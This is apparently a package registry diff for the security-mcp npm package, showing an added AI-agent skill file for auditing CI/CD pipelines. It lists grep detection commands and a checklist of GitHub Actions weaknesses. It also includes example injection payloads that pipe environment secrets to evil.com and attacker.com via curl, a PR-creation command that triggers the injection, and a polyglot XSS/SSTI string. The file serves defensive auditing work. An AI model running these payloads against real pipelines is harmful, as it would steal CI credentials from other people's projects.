security-mcp 1.1.4 → 1.3.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (158) hide show
  1. package/README.md +341 -1018
  2. package/defaults/checklists/ai.json +20 -1
  3. package/defaults/checklists/api.json +35 -1
  4. package/defaults/checklists/infra.json +34 -1
  5. package/defaults/checklists/mobile.json +23 -1
  6. package/defaults/checklists/payments.json +15 -1
  7. package/defaults/checklists/web.json +11 -1
  8. package/defaults/cloud-controls/aws.json +10712 -0
  9. package/defaults/cloud-controls/azure.json +7201 -0
  10. package/defaults/cloud-controls/gcp.json +4061 -0
  11. package/defaults/control-catalog.json +24 -0
  12. package/defaults/security-policy.json +2 -2
  13. package/dist/ci/pr-gate.js +22 -5
  14. package/dist/cli/index.js +73 -2
  15. package/dist/cli/install.js +4 -55
  16. package/dist/cli/onboarding.js +18 -10
  17. package/dist/gate/baseline.js +82 -7
  18. package/dist/gate/catalog.js +10 -2
  19. package/dist/gate/checks/agentic-instructions.js +515 -0
  20. package/dist/gate/checks/ai-governance.js +132 -0
  21. package/dist/gate/checks/ai.js +757 -39
  22. package/dist/gate/checks/auth-deep.js +920 -216
  23. package/dist/gate/checks/business-logic.js +751 -0
  24. package/dist/gate/checks/ci-pipeline.js +399 -4
  25. package/dist/gate/checks/cloud-controls.js +69 -0
  26. package/dist/gate/checks/crypto.js +423 -2
  27. package/dist/gate/checks/data-platform.js +954 -0
  28. package/dist/gate/checks/dependencies.js +582 -15
  29. package/dist/gate/checks/docker-deep.js +1236 -0
  30. package/dist/gate/checks/gitops.js +724 -0
  31. package/dist/gate/checks/graphql.js +201 -19
  32. package/dist/gate/checks/iac.js +1230 -0
  33. package/dist/gate/checks/infra.js +246 -1
  34. package/dist/gate/checks/injection-deep.js +827 -184
  35. package/dist/gate/checks/k8s.js +955 -2
  36. package/dist/gate/checks/mobile-android.js +917 -3
  37. package/dist/gate/checks/mobile-ios.js +797 -5
  38. package/dist/gate/checks/required-artifacts.js +194 -0
  39. package/dist/gate/checks/runtime.js +178 -0
  40. package/dist/gate/checks/secrets.js +256 -13
  41. package/dist/gate/checks/supply-chain-deep.js +787 -0
  42. package/dist/gate/checks/web-nextjs.js +572 -48
  43. package/dist/gate/cloud-controls/apply.js +115 -0
  44. package/dist/gate/cloud-controls/bicep.js +36 -0
  45. package/dist/gate/cloud-controls/cfn.js +125 -0
  46. package/dist/gate/cloud-controls/detect.js +104 -0
  47. package/dist/gate/cloud-controls/hcl.js +140 -0
  48. package/dist/gate/cloud-controls/types.js +87 -0
  49. package/dist/gate/diff.js +17 -5
  50. package/dist/gate/evidence.js +8 -1
  51. package/dist/gate/exceptions.js +202 -9
  52. package/dist/gate/findings.js +15 -2
  53. package/dist/gate/policy.js +316 -130
  54. package/dist/gate/threat-intel.js +6 -0
  55. package/dist/mcp/audit-chain.js +131 -28
  56. package/dist/mcp/auth.js +169 -0
  57. package/dist/mcp/learning.js +129 -4
  58. package/dist/mcp/model-router.js +161 -24
  59. package/dist/mcp/orchestration.js +377 -89
  60. package/dist/mcp/server.js +460 -69
  61. package/dist/mcp/tool-audit.js +193 -0
  62. package/dist/repo/fs.js +37 -1
  63. package/dist/repo/search.js +31 -6
  64. package/dist/review/store.js +56 -3
  65. package/dist/tests/run.js +124 -1
  66. package/package.json +9 -9
  67. package/skills/_TEMPLATE/SKILL.md +99 -0
  68. package/skills/advanced-dos-tester/SKILL.md +118 -0
  69. package/skills/agentic-instruction-auditor/SKILL.md +111 -0
  70. package/skills/agentic-loop-exploiter/SKILL.md +377 -0
  71. package/skills/ai-llm-redteam/SKILL.md +113 -0
  72. package/skills/ai-model-supply-chain-agent/SKILL.md +112 -0
  73. package/skills/algorithm-implementation-reviewer/SKILL.md +107 -0
  74. package/skills/android-penetration-tester/SKILL.md +464 -46
  75. package/skills/anti-replay-tester/SKILL.md +115 -0
  76. package/skills/appsec-code-auditor/SKILL.md +94 -0
  77. package/skills/artifact-integrity-analyst/SKILL.md +450 -0
  78. package/skills/attack-navigator/SKILL.md +476 -8
  79. package/skills/auth-session-hacker/SKILL.md +111 -0
  80. package/skills/aws-penetration-tester/SKILL.md +510 -0
  81. package/skills/azure-penetration-tester/SKILL.md +542 -3
  82. package/skills/binary-auth-validator/SKILL.md +120 -0
  83. package/skills/bot-detection-specialist/SKILL.md +118 -0
  84. package/skills/business-logic-attacker/SKILL.md +240 -0
  85. package/skills/capec-code-mapper/SKILL.md +93 -0
  86. package/skills/cert-pin-rotation-specialist/SKILL.md +121 -0
  87. package/skills/cicd-pipeline-hijacker/SKILL.md +414 -0
  88. package/skills/ciso-orchestrator/SKILL.md +465 -43
  89. package/skills/cloud-infra-specialist/SKILL.md +127 -0
  90. package/skills/compliance-gap-analyst/SKILL.md +431 -0
  91. package/skills/compliance-grc/SKILL.md +94 -0
  92. package/skills/compliance-lifecycle-tracker/SKILL.md +93 -0
  93. package/skills/container-hardening-auditor/SKILL.md +125 -0
  94. package/skills/credential-stuffing-specialist/SKILL.md +111 -0
  95. package/skills/crypto-pki-specialist/SKILL.md +96 -0
  96. package/skills/csa-ccm-mapper/SKILL.md +93 -0
  97. package/skills/csf2-governance-mapper/SKILL.md +93 -0
  98. package/skills/data-platform-auditor/SKILL.md +125 -0
  99. package/skills/deep-link-fuzzer/SKILL.md +118 -0
  100. package/skills/dependency-confusion-attacker/SKILL.md +424 -0
  101. package/skills/device-integrity-aggregator/SKILL.md +117 -0
  102. package/skills/dos-resilience-tester/SKILL.md +106 -0
  103. package/skills/dread-scorer/SKILL.md +93 -0
  104. package/skills/egress-policy-enforcer/SKILL.md +108 -0
  105. package/skills/evidence-collector/SKILL.md +107 -0
  106. package/skills/file-upload-attacker/SKILL.md +118 -0
  107. package/skills/gcp-penetration-tester/SKILL.md +510 -2
  108. package/skills/git-history-secret-scanner/SKILL.md +115 -0
  109. package/skills/gitops-delivery-auditor/SKILL.md +120 -0
  110. package/skills/iac-security-auditor/SKILL.md +125 -0
  111. package/skills/iam-privesc-graph-builder/SKILL.md +161 -0
  112. package/skills/incident-responder/SKILL.md +120 -0
  113. package/skills/injection-specialist/SKILL.md +111 -0
  114. package/skills/ios-security-auditor/SKILL.md +291 -0
  115. package/skills/json-ambiguity-tester/SKILL.md +145 -0
  116. package/skills/k8s-container-escaper/SKILL.md +406 -0
  117. package/skills/key-management-lifecycle-analyst/SKILL.md +107 -0
  118. package/skills/kill-switch-engineer/SKILL.md +111 -0
  119. package/skills/linddun-privacy-analyst/SKILL.md +111 -0
  120. package/skills/logic-race-fuzzer/SKILL.md +452 -0
  121. package/skills/mobile-api-network-attacker/SKILL.md +430 -0
  122. package/skills/mobile-binary-hardener/SKILL.md +111 -0
  123. package/skills/mobile-security-specialist/SKILL.md +94 -0
  124. package/skills/mobile-webview-auditor/SKILL.md +105 -0
  125. package/skills/model-extraction-attacker/SKILL.md +228 -0
  126. package/skills/multipart-abuse-tester/SKILL.md +93 -0
  127. package/skills/oauth-pkce-specialist/SKILL.md +113 -0
  128. package/skills/parser-exhaustion-tester/SKILL.md +151 -0
  129. package/skills/pentest-infra/SKILL.md +107 -0
  130. package/skills/pentest-social/SKILL.md +210 -0
  131. package/skills/pentest-team/SKILL.md +96 -0
  132. package/skills/pentest-web-api/SKILL.md +107 -0
  133. package/skills/privacy-flow-analyst/SKILL.md +243 -0
  134. package/skills/prompt-injection-specialist/SKILL.md +403 -0
  135. package/skills/quantum-migration-planner/SKILL.md +105 -0
  136. package/skills/rag-poisoning-specialist/SKILL.md +367 -0
  137. package/skills/registry-mirror-enforcer/SKILL.md +93 -0
  138. package/skills/rotation-validation-agent/SKILL.md +121 -0
  139. package/skills/samm-assessor/SKILL.md +94 -0
  140. package/skills/secrets-mask-bypass-tester/SKILL.md +109 -0
  141. package/skills/senior-security-engineer/SKILL.md +178 -0
  142. package/skills/serialization-memory-attacker/SKILL.md +341 -0
  143. package/skills/session-timeout-tester/SKILL.md +170 -0
  144. package/skills/slsa-level3-enforcer/SKILL.md +121 -0
  145. package/skills/slsa-provenance-enforcer/SKILL.md +111 -0
  146. package/skills/ssrf-detection-validator/SKILL.md +117 -0
  147. package/skills/step-up-auth-enforcer/SKILL.md +93 -0
  148. package/skills/stride-pasta-analyst/SKILL.md +429 -0
  149. package/skills/supply-chain-devsecops/SKILL.md +107 -0
  150. package/skills/threat-infrastructure-analyst/SKILL.md +93 -0
  151. package/skills/threat-modeler/SKILL.md +94 -0
  152. package/skills/tls-certificate-auditor/SKILL.md +582 -18
  153. package/skills/token-reuse-detector/SKILL.md +104 -0
  154. package/skills/trike-risk-modeler/SKILL.md +93 -0
  155. package/skills/unicode-homograph-tester/SKILL.md +93 -0
  156. package/skills/waf-rule-lifecycle-agent/SKILL.md +106 -0
  157. package/skills/webhook-security-tester/SKILL.md +111 -0
  158. package/skills/zero-trust-architect/SKILL.md +118 -0
@@ -22,6 +22,15 @@ and every secret in the CI environment is a target.
22
22
  Find every CI/CD pipeline vulnerability that could allow secret exfiltration, unauthorized
23
23
  deployment, or pipeline poisoning. Write fixed workflow YAML inline. Covers §6 fully.
24
24
 
25
+ ## BEYOND THE CHECKS — AUTONOMOUS DETECT & FIX
26
+
27
+ The `ci-pipeline.ts` detection module (`src/gate/checks/ci-pipeline.ts`), with `supply-chain-deep.ts` for provenance, is your deterministic floor, not your ceiling. Treat its finding IDs as the minimum, then reason past what single-line/single-file pattern matching can see — and APPLY the fix (Edit the workflow YAML / trust policy), not just advise:
28
+
29
+ - **Cross-file / data-flow reasoning the regex can't do:** a `pull_request_target` trigger in one workflow that checks out fork head and invokes a reusable workflow in another file (which then uses an unsanitized `input` in `run:`) is a poisoned-pipeline-execution chain no single-file grep resolves.
30
+ - **Semantic / effective-state analysis:** model the trust boundary — does an OIDC `sub` condition in the IaC trust policy actually pin `ref:refs/heads/main`, or can any PR branch assume the production role; is a `${{ github.event.* }}` value reaching a shell context without an intermediate `env:` that forces quoting; is the runner ephemeral.
31
+ - **External corroboration:** use WebSearch/WebFetch for current GitHub Actions hardening guidance, pipeline-injection CVEs, and known-good Action commit SHAs.
32
+ - **Apply & prove:** write the fix inline (pin Actions to full SHA, scope OIDC subject, set minimal `permissions`, route event context through `env:`, add SLSA provenance), re-run the `ci-pipeline.ts`/`supply-chain-deep.ts` checks plus an actionlint/zizmor regression floor, then re-audit the trust boundary semantically. Emit the LEARNING SIGNAL per fix; surface any fix that changes intended behavior as an explicit trade-off with the secure default.
33
+
25
34
  ## EXECUTION
26
35
 
27
36
  1. Scan `.github/workflows/`, `.gitlab-ci.yml`, `Jenkinsfile`, `.circleci/config.yml`,
@@ -79,3 +88,408 @@ If internet permitted:
79
88
  - Attack scenario (who can exploit, what secret is exfiltrated, what deployment is hijacked)
80
89
  - Fixed workflow YAML written inline
81
90
  - §6 pipeline gate status (present/missing per gate type)
91
+
92
+ Every findings JSON MUST include `intelligenceForOtherAgents`:
93
+ ```json
94
+ {
95
+ "intelligenceForOtherAgents": {
96
+ "forPentestTeam": [{ "type": "HIGH_VALUE_TARGET", "description": "...", "exploitHint": "..." }],
97
+ "forCryptoSpecialist": [{ "type": "CRYPTO_WEAKNESS_REFERENCE", "algorithm": "...", "location": "..." }],
98
+ "forCloudSpecialist": [{ "type": "SSRF_TO_CLOUD_CHAIN", "ssrfLocation": "...", "escalationPath": "..." }],
99
+ "forComplianceGrc": [{ "type": "COMPLIANCE_BLOCKER", "frameworks": ["..."], "releaseBlock": true }]
100
+ }
101
+ }
102
+ ```
103
+
104
+ ---
105
+
106
+ ## BEYOND SKILL.MD — MANDATORY EXPANSIONS
107
+
108
+ ### 1. Dependency Confusion / Namespace Squatting in Build Pipelines (CVE-2021-22005 class)
109
+
110
+ **Technique:** When a private package registry is configured but public registry fallback is
111
+ enabled, an attacker registers a public package with the same name as an internal package at
112
+ a higher version number. npm/pip/Maven resolves the highest version, pulling attacker code
113
+ into the build.
114
+
115
+ **Detection:**
116
+ ```bash
117
+ # Check for dual-registry npm configs without scope-locking
118
+ grep -r "registry" .npmrc .yarnrc .yarnrc.yml package.json
119
+ # Finding: registry set globally without per-scope pinning to internal registry
120
+ grep -r "strict-ssl\|always-auth" .npmrc
121
+ # Check Gemfile/requirements.txt/pom.xml for internal-only package names
122
+ ```
123
+ **Finding constitutes:** Any pipeline that installs packages without `--prefer-offline` or
124
+ scope-locked registry config, where internal package names are discoverable.
125
+
126
+ ### 2. GitHub Actions Expression Injection via `toJSON()` (GHSL-2021-219 class)
127
+
128
+ **Technique:** GitHub Actions `toJSON(github.event)` or individual PR-event fields
129
+ (`github.event.pull_request.body`, `github.event.issue.title`) embedded inside `run:` steps
130
+ allow attacker-controlled content to break out of the shell context. Classic payload:
131
+ `"; curl https://evil.com/$(cat /proc/self/environ | base64) #`
132
+
133
+ **Detection:**
134
+ ```bash
135
+ grep -rn "github\.event\." .github/workflows/ | grep -v "if:" | grep "run:"
136
+ grep -rn "\${{ github\.event\.pull_request\." .github/workflows/
137
+ grep -rn "\${{ github\.event\.issue\." .github/workflows/
138
+ grep -rn "\${{ github\.event\.comment\." .github/workflows/
139
+ ```
140
+ **Finding constitutes:** Any `${{ github.event.* }}` interpolation that appears inside a
141
+ `run:` block without intermediate `env:` variable assignment (which forces shell escaping).
142
+
143
+ ### 3. Poisoned Pipeline Execution (PPE) via `.github/workflows` in Fork PRs
144
+
145
+ **Technique:** `pull_request_target` runs in the base repo's context with full secrets access
146
+ but checks out the fork's code. Attacker opens a PR from a fork that modifies workflow files
147
+ or referenced scripts; the workflow executes attacker-controlled steps with production secrets.
148
+ Research published by Argon Security (2021), now codified as MITRE ATT&CK T1195.001.
149
+
150
+ **Detection:**
151
+ ```bash
152
+ # CRITICAL: find pull_request_target triggers
153
+ grep -rn "pull_request_target" .github/workflows/
154
+ # Then check if any such workflow checks out PR head
155
+ grep -A 20 "pull_request_target" .github/workflows/*.yml | grep -E "ref.*head|checkout.*head"
156
+ ```
157
+ **Finding constitutes:** `pull_request_target` trigger + `actions/checkout` using
158
+ `ref: ${{ github.event.pull_request.head.sha }}` or `ref: ${{ github.head_ref }}`.
159
+
160
+ ### 4. OIDC Audience Bypass and Overly Broad Subject Claims
161
+
162
+ **Technique:** GitHub Actions OIDC tokens carry a `sub` (subject) claim like
163
+ `repo:org/repo:ref:refs/heads/main`. If an AWS IAM role's trust policy uses only
164
+ `repo:org/repo` in the condition (missing the `ref` component), any branch — including an
165
+ attacker's PR branch — can assume the production role. This maps to the 2023 Datadog
166
+ incident and multiple public GitHub Security Lab disclosures.
167
+
168
+ **Detection:**
169
+ ```bash
170
+ # Find OIDC usage in workflows
171
+ grep -rn "id-token\|oidc\|aws-actions/configure-aws-credentials" .github/workflows/
172
+ # Find trust policy definitions in Terraform/CloudFormation
173
+ grep -rn "StringLike\|StringEquals" infra/ terraform/ | grep -i "token.actions"
174
+ # Finding: subject condition missing ref: clause or using StringLike with wildcard
175
+ grep -rn "repo:\*\|:*\"" infra/ terraform/ | grep -i "token.actions"
176
+ ```
177
+ **Finding constitutes:** Trust policy `StringLike` condition on OIDC sub that permits any
178
+ branch (`*`) to assume a role that has write access to production resources.
179
+
180
+ ### 5. Self-Hosted Runner Persistence via T1053.005 (Scheduled Task / Cron)
181
+
182
+ **Technique:** A self-hosted GitHub Actions runner executes as a service account on a
183
+ persistent VM or container. An attacker who achieves code execution within a CI job
184
+ (via injection or supply chain) can write a crontab entry, systemd timer, or launch daemon
185
+ that survives across job boundaries, effectively APT-persisting on the runner host and
186
+ intercepting future secrets from all jobs that use that runner.
187
+
188
+ **Detection:**
189
+ ```bash
190
+ # Identify self-hosted runner usage
191
+ grep -rn "runs-on: self-hosted\|runs-on:.*self-hosted" .github/workflows/
192
+ # Check if runners are ephemeral (just-in-time runners) or persistent
193
+ # Check runner registration in org settings; look for runner group isolation
194
+ grep -rn "runs-on:" .github/workflows/ | grep -v "ubuntu-\|windows-\|macos-"
195
+ ```
196
+ **Finding constitutes:** `runs-on: self-hosted` or any non-ephemeral runner label on a
197
+ workflow that handles production secrets, without documented ephemeral/JIT runner configuration.
198
+
199
+ ### 6. Artifact Poisoning and Build Provenance Gaps (SLSA Levels 0-1)
200
+
201
+ **Technique:** When a CI pipeline uploads build artifacts without cryptographic provenance
202
+ attestation, a compromised intermediate step (build server, artifact store, CDN) can silently
203
+ replace legitimate artifacts with backdoored ones. This is the exact mechanism behind the
204
+ SolarWinds Orion and XZ Utils attacks. SLSA L2+ requires signed provenance; SLSA L3+ requires
205
+ a hermetic, reproducible build.
206
+
207
+ **Detection:**
208
+ ```bash
209
+ # Check for SLSA provenance generation
210
+ grep -rn "slsa-framework/slsa-github-generator\|sigstore\|cosign\|in-toto" .github/workflows/
211
+ # Check for artifact signature verification at deploy time
212
+ grep -rn "cosign verify\|slsa-verifier" .github/workflows/ Makefile deploy/
213
+ # Check npm publish workflow for provenance flag
214
+ grep -rn "npm publish\|--provenance" .github/workflows/
215
+ ```
216
+ **Finding constitutes:** Any release or deployment pipeline that publishes artifacts,
217
+ container images, or npm packages without SLSA L2 provenance attestation.
218
+
219
+ ### 7. AI-Assisted Workflow Generation Introducing New Attack Surfaces (Emerging Threat)
220
+
221
+ **Technique:** Developers increasingly use LLMs (GitHub Copilot, ChatGPT, Claude) to generate
222
+ CI/CD workflow YAML. These tools frequently produce `pull_request_target` triggers, mutable
223
+ SHA tags, `permissions: write-all`, and direct `${{ github.event.* }}` interpolations because
224
+ their training data predates GitHub's security hardening guidance. A single LLM-generated
225
+ workflow in a large repo can introduce a CRITICAL pipeline injection vector.
226
+
227
+ **Detection:**
228
+ ```bash
229
+ # Look for recently added workflow files (last 90 days) and audit them specifically
230
+ git log --since="90 days ago" --name-only --diff-filter=A -- ".github/workflows/*.yml"
231
+ # For each new file, run the full injection pattern battery
232
+ grep -n "pull_request_target\|write-all\|github\.event\.\|@v[0-9]" .github/workflows/
233
+ ```
234
+ **Finding constitutes:** Any newly added workflow file containing injection-prone patterns,
235
+ regardless of source. Flag for developer education on AI-generated pipeline risks.
236
+
237
+ ### 8. Post-Quantum Supply Chain: Signing Key Compromise and Harvest-Now-Decrypt-Later
238
+
239
+ **Technique:** Build pipeline signing keys (GPG keys for apt/rpm repos, code signing
240
+ certificates, npm publish tokens, container image signing keys) generated today using
241
+ RSA-2048 or ECDSA P-256 are vulnerable to harvest-now-decrypt-later attacks. Adversaries
242
+ capturing signed release artifacts and their associated metadata today will be able to
243
+ forge signatures once CRQCs become available (est. 2028-2032). This is especially relevant
244
+ for long-lived software like OS packages, firmware, and enterprise SDKs.
245
+
246
+ **Detection:**
247
+ ```bash
248
+ # Find GPG key sizes used for package signing
249
+ grep -rn "gpg --gen-key\|gpg --sign\|KEY_ID\|GPG_PRIVATE_KEY" .github/workflows/ Makefile
250
+ # Check cosign key algorithm in existing signing configs
251
+ find . -name "cosign.key" -o -name "*.pub" | xargs file 2>/dev/null | grep -i "rsa\|ecdsa"
252
+ # Find npm publish auth tokens — check if 2FA/granular tokens are used
253
+ grep -rn "NPM_TOKEN\|NODE_AUTH_TOKEN" .github/workflows/
254
+ ```
255
+ **Finding constitutes:** Release pipeline using RSA/ECDSA signing keys with no documented
256
+ migration plan to ML-DSA (FIPS 204) or ML-KEM (FIPS 203) equivalent; any signing key stored
257
+ as a plaintext GitHub secret without rotation policy.
258
+
259
+ ---
260
+
261
+ ## §CICD_PIPELINE_HIJACKER-CHECKLIST
262
+
263
+ 1. **pull_request_target checkout of fork head** — Mechanism: `pull_request_target` trigger
264
+ with `actions/checkout` using `ref: ${{ github.event.pull_request.head.sha }}` executes
265
+ attacker code with base-repo secrets. Grep: `grep -rn "pull_request_target" .github/workflows/`
266
+ then check following `checkout` step. Finding: any co-occurrence of trigger + head checkout.
267
+
268
+ 2. **Mutable Action SHA pinning** — Mechanism: `uses: org/action@v1` resolves to a mutable
269
+ git tag that can be silently updated by the action author or a compromised account.
270
+ Grep: `grep -rn "uses:.*@v[0-9]\|uses:.*@main\|uses:.*@master" .github/workflows/`
271
+ Finding: any `uses:` not pinned to a full 40-character commit SHA.
272
+
273
+ 3. **Expression injection via PR-controlled context values** — Mechanism: `${{ github.event.
274
+ pull_request.title/body/head.ref }}` inside `run:` allows shell breakout.
275
+ Grep: `grep -rn "\${{ github\.event\." .github/workflows/ | grep -v "env:"`.
276
+ Finding: event context directly in `run:` without intermediate `env:` variable.
277
+
278
+ 4. **Overly broad GITHUB_TOKEN permissions** — Mechanism: `permissions: write-all` or absent
279
+ `permissions` block grants all tokens write access to code, issues, packages, and secrets.
280
+ Grep: `grep -rn "permissions:" .github/workflows/` — absence of block = finding.
281
+ Finding: any workflow without explicit minimal `permissions` declaration.
282
+
283
+ 5. **OIDC subject claim too permissive** — Mechanism: AWS/GCP/Azure trust policy accepting
284
+ `repo:org/repo:*` (wildcard branch) allows PR branches to assume production roles.
285
+ Test: extract trust policy conditions from Terraform/IaC; verify `ref:refs/heads/main`
286
+ is required. Finding: OIDC trust condition missing branch/tag restriction.
287
+
288
+ 6. **Self-hosted runner without ephemeral isolation** — Mechanism: persistent runner VMs
289
+ retain filesystem state between jobs, enabling T1053.005 persistence.
290
+ Grep: `grep -rn "runs-on:" .github/workflows/ | grep -v "ubuntu-\|windows-\|macos-"`.
291
+ Finding: any non-GitHub-hosted runner label without documented ephemeral provisioning.
292
+
293
+ 7. **Secret leakage into logs or artifacts** — Mechanism: `set -x`, `env` dump, or artifact
294
+ upload of files containing secret values exposes credentials in workflow run logs.
295
+ Grep: `grep -rn "set -x\|printenv\|env\b" .github/workflows/` + check artifact upload paths.
296
+ Finding: any command that could expand secret values into stdout in a `run:` step.
297
+
298
+ 8. **Cache key poisoning in shared caches** — Mechanism: cache key includes attacker-controlled
299
+ data (branch name, PR number, file hash of attacker-modified file), allowing cache
300
+ replacement that persists to other branches.
301
+ Grep: `grep -rn "cache-dependency-path\|key:" .github/workflows/ | grep "github\.head_ref\|github\.sha"`.
302
+ Finding: cache key that incorporates PR-contributor-controlled data.
303
+
304
+ 9. **Reusable workflow input injection** — Mechanism: caller workflow passes attacker-controlled
305
+ data as `inputs` to a trusted reusable workflow that uses inputs in `run:` steps.
306
+ Grep: `grep -rn "workflow_call" .github/workflows/` then audit `inputs:` usage in `run:`.
307
+ Finding: reusable workflow `inputs` used directly in shell steps without sanitization.
308
+
309
+ 10. **Missing pipeline security gates on PR path** — Mechanism: absence of required status
310
+ checks (SAST, SCA, container scan, IaC scan) means vulnerable code reaches production.
311
+ Test: check branch protection rules via `gh api repos/OWNER/REPO/branches/main/protection`.
312
+ Finding: any of CodeQL/Semgrep, Dependabot/Snyk, Trivy/Grype, tfsec/Checkov absent from
313
+ required status checks on the default branch.
314
+
315
+ 11. **Artifact without provenance attestation (SLSA gap)** — Mechanism: unsigned artifacts
316
+ allow supply chain substitution between build and deployment.
317
+ Grep: `grep -rn "upload-artifact\|npm publish\|docker push" .github/workflows/` then verify
318
+ corresponding `slsa-github-generator` or `cosign sign` step.
319
+ Finding: any release or publish step without provenance generation.
320
+
321
+ 12. **Dependency confusion via public registry fallback** — Mechanism: `.npmrc` or `pip.conf`
322
+ configured with internal registry but no scope-lock, enabling namespace squatting.
323
+ Grep: `grep -rn "registry\|index-url\|extra-index-url" .npmrc .yarnrc pip.conf setup.cfg`.
324
+ Finding: internal registry configured without scope-locking or `--no-dependencies` flag
325
+ preventing public fallback for private package names.
326
+
327
+ ---
328
+
329
+ ## §POC-REQUIREMENT
330
+
331
+ For every CRITICAL or HIGH finding in this domain:
332
+
333
+ 1. **Write the working PoC FIRST** (exact payload, exact request, observed impact)
334
+ 2. **Confirm the PoC reproduces the issue**
335
+ 3. **THEN write the fix**
336
+ 4. **THEN verify the PoC fails against the fix**
337
+ 5. **Record the PoC in findings JSON under `exploitPoC`**
338
+
339
+ PoC skipping = finding severity downgraded to MEDIUM automatically.
340
+
341
+ **Example PoC structure for pipeline injection finding:**
342
+
343
+ ```json
344
+ {
345
+ "findingId": "CICD-001",
346
+ "severity": "CRITICAL",
347
+ "class": "Pipeline Expression Injection",
348
+ "exploitPoC": {
349
+ "precondition": "Attacker forks repo and opens a PR",
350
+ "payload": "PR title set to: a\"; curl https://attacker.com/$(env | base64 -w0); echo \"",
351
+ "triggerStep": "Push commit to fork branch — workflow triggers on pull_request_target",
352
+ "observedImpact": "HTTP request received at attacker.com containing all environment variables including AWS_SECRET_ACCESS_KEY",
353
+ "reproduced": true,
354
+ "reproductionCommand": "gh pr create --title 'a\"; curl https://[interactsh-url]/$(env|base64 -w0); echo \"' --body test"
355
+ },
356
+ "fix": {
357
+ "description": "Use intermediate env var to force shell quoting",
358
+ "fixedYaml": "env:\n PR_TITLE: ${{ github.event.pull_request.title }}\nrun: echo \"$PR_TITLE\"",
359
+ "pocFailsAfterFix": true
360
+ }
361
+ }
362
+ ```
363
+
364
+ ---
365
+
366
+ ## §PROJECT-ESCALATION
367
+
368
+ Immediately call `orchestration.update_agent_status` with `"CRITICAL_ESCALATION"` and halt
369
+ other findings collection to alert the orchestrator under ANY of these conditions:
370
+
371
+ 1. **Live secret confirmed exfiltrated from pipeline logs** — A GitHub Actions or CI log
372
+ contains a plaintext AWS key, GitHub PAT, npm token, or other credential that is currently
373
+ valid. The credential must be rotated before any further analysis proceeds. Exfiltration
374
+ window is open right now.
375
+
376
+ 2. **Production deployment reachable from fork PR without approval** — `pull_request_target`
377
+ + checkout of fork head + production secrets in the same workflow = an unauthenticated
378
+ external contributor can deploy arbitrary code to production infrastructure in a single PR.
379
+ This is an active critical attack surface.
380
+
381
+ 3. **OIDC trust policy allows any branch to assume a production IAM/GCP role** — An attacker
382
+ opening any PR branch can obtain cloud credentials scoped to production resources. This is
383
+ equivalent to a publicly exposed production credentials endpoint.
384
+
385
+ 4. **Self-hosted runner confirmed to have persistent attacker artifact** — Evidence of a
386
+ cron entry, systemd service, SSH authorized_keys modification, or `.bashrc`/`.profile`
387
+ modification in a runner's filesystem that was introduced by a CI job. Active compromise
388
+ of build infrastructure.
389
+
390
+ 5. **Third-party Action at mutable tag confirmed to be backdoored** — SHA mismatch between
391
+ the tag the workflow references and the expected content, or a known-malicious SHA
392
+ identified via GitHub Security Advisory or supply chain threat intelligence feed.
393
+ Equivalent to a confirmed malware insertion in the build toolchain.
394
+
395
+ 6. **Secrets committed to workflow file or `.env` file in repository** — Hardcoded API keys,
396
+ tokens, or credentials found directly in workflow YAML, `Makefile`, or environment files
397
+ that are committed to git history. Requires immediate rotation and git history purge.
398
+
399
+ 7. **No security gates on any path to production** — Zero SAST, SCA, container, or IaC
400
+ checks required before production deployment, AND deployment is automated on merge to main.
401
+ Combined with a single injection finding, this represents full, undetected compromise-to-
402
+ production capability.
403
+
404
+ 8. **Evidence of CI/CD pipeline compromise in git history** — Unexpected workflow file
405
+ modification by a non-core contributor, anomalous commit patterns, or workflow modifications
406
+ that occurred without a corresponding PR review. Indicates pipeline may already be
407
+ compromised; all artifacts produced since the suspicious commit are potentially tainted.
408
+
409
+ ---
410
+
411
+ ## §EDGE-CASE-MATRIX
412
+
413
+ The 5 attack cases in this domain that automated scanners and naive manual review universally miss. MANDATORY checks — do not skip.
414
+
415
+ | # | Edge Case | Why Scanners Miss It | Concrete Test |
416
+ |---|-----------|----------------------|---------------|
417
+ | 1 | Second-order / stored payload executed in different context | Scanner checks input context, not execution context | Store payload safely; trigger in separate request/session |
418
+ | 2 | Unicode normalisation bypass | Regex filters run before normalisation; attacker uses homoglyphs or composed forms | Submit Ⅰ (U+2160) or < (U+FF1C) variants of known-bad strings |
419
+ | 3 | Polyglot payload active in multiple sinks simultaneously | Scanners test one injection class per payload | `'"><script>{{7*7}}</script><!--` — SQL + XSS + SSTI in one request |
420
+ | 4 | Out-of-band exfiltration (DNS/HTTP callback) | Scanner looks for inline response difference; OOB leaves no visible trace | Use Burp Collaborator / interactsh; inject DNS lookup payload |
421
+ | 5 | Race condition between check and use (TOCTOU) | Sequential scanners don't model concurrency | Send two simultaneous requests to the same state-changing endpoint |
422
+
423
+ ---
424
+
425
+ ## §TEMPORAL-THREATS
426
+
427
+ Threats materialising in the 2025–2030 window that defences designed today must account for.
428
+
429
+ | Threat | Est. Timeline | Relevance to This Domain | Prepare Now By |
430
+ |--------|--------------|--------------------------|----------------|
431
+ | Cryptographically Relevant Quantum Computer (CRQC) | 2028–2032 | Harvest-now-decrypt-later attacks active today; RSA/ECDSA keys signed today will be broken | Inventory all RSA/ECDSA usage; migrate long-lived data to ML-KEM (FIPS 203) |
432
+ | AI-assisted adversaries at scale | 2025–2027 (active) | LLM-powered fuzzing finds 10× more edge cases; automated PoC generation | Assume attackers have LLM help; expand test surface to match |
433
+ | EU AI Act full enforcement | 2026 | High-risk AI systems require mandatory conformity assessments | Classify all AI features against AI Act tiers now |
434
+ | Post-quantum TLS migration deadline | 2028–2030 | Browser vendors will drop classical-only TLS connections | Begin TLS agility assessment; test hybrid key exchange |
435
+ | Mandatory SBOM + build provenance (US EO 14028 / EU CRA) | 2025–2026 (active) | SBOM and SLSA attestation are becoming legally required | Achieve SLSA L2 minimum; generate CycloneDX SBOM per release |
436
+
437
+ ---
438
+
439
+ ## §DETECTION-GAP
440
+
441
+ What current security monitoring CANNOT detect in this domain, and what to build to close each gap.
442
+
443
+ **Standard gaps that MUST be checked:**
444
+
445
+ - **Second-order attack execution**: The storage request looks safe; only the retrieval+execution step is dangerous. Need: correlate write events with downstream read+execute events in the same SIEM query window.
446
+ - **Timing-side-channel leakage**: No log event emitted; only observable as microsecond response-time variance. Need: per-endpoint p99 latency tracking with statistical anomaly detection.
447
